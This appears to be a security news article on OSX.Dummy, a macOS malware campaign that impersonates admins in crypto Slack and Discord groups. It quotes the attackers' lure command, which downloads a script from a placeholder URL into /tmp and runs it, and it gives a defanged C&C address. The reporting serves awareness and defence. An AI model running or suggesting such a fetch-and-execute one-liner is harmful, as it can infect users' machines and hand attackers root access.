Wednesday, April 30, 2025
HomeMalwareMACOS Malware Targeting Cryptocurrency Users On Slack and Discord - 100% Undetected...

MACOS Malware Targeting Cryptocurrency Users On Slack and Discord – 100% Undetected Virustotal

Published on

SIEM as a Service

Follow Us on Google News

Hackers targeting Cryptocurrency users On Slack and Discord chat platforms with MACOS Malware dubbed OSX.Dummy.

The malware targeted users in crypto related chat groups Slack or Discord by impersonating admins or key people. Attackers shared small snippets which result in downloading the malware said Remco Verhoef, who spotted the malware first.

Hackers trick’s users to get infect themselves by running the following script, that results in downloading the malware.

- Advertisement - Google News
$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

If victims execute the curl command it downloads the large mach064 binary (34M) to /tmp/script which has a perfect score on virustotal 0/64 and the file executed.

MACOS Malware not signed

The MACOS malware was later analyzed by malware researcher Patrick Wardle, according to his analysis report the MACOS Malware was not signed and it contains various libraries such as OpenSSL and V8 appear to be statically compiled in.

The malware bypass Gatekeeper that restricts running unsigned binaries, it was first introduced in Mac OS X Leopard, it enforces codesigning and verifies the application before running.

But if the user downloads and run the binaries through the terminal, GateKeeper does not come into play, so an unsigned binary will be executed.

Wardle said the malware set’s itself to run as root and requires users to enter a password for changing file permission. Then the password will be saved to /tmp/dumpdummy and then malware sets the script to be executable.

If the attack successful then malware establishes the connection to attackers C&C server (185[.]243[.]115[.]230) through port 1337 and the attacker can execute arbitrary commands as root user on the infected machine.

Also Read

New Android RAT Spotted in Wild Abusing Telegram Protocol for Command and Control

Chinese APT’s New Malware MirageFox Launch Cyber Attack on Government & Military Sectors

Banking Malware posed as a Popular Social Media App to Steal Financial Data From Online Banking Systems

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

Trellix Launches Phishing Simulator to Help Organizations Detect and Prevent Attacks

Trellix, a leader in cybersecurity solutions, has unveiled its latest innovation, the Trellix Phishing...

AiTM Phishing Kits Bypass MFA by Hijacking Credentials and Session Tokens

Darktrace's Security Operations Center (SOC) in late 2024 and early 2025, cybercriminals have been...

Nitrogen Ransomware Uses Cobalt Strike and Log Wiping in Targeted Attacks on Organizations

Threat actors have leveraged the Nitrogen ransomware campaign to target organizations through deceptive malvertising...

Researchers Reveal Threat Actor TTP Patterns and DNS Abuse in Investment Scams

Cybersecurity researchers have uncovered the intricate tactics, techniques, and procedures (TTPs) employed by threat...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

New WordPress Malware Disguised as Anti-Malware Plugin Takes Full Control of Websites

The Wordfence Threat Intelligence team has identified a new strain of WordPress malware that...

Konni APT Deploys Multi-Stage Malware in Targeted Organizational Attacks

A sophisticated multi-stage malware campaign, potentially orchestrated by the North Korean Konni Advanced Persistent...

Outlaw Cybergang Launches Global Attacks on Linux Environments with New Malware

The Outlaw cybergang, also known as “Dota,” has intensified its global assault on Linux...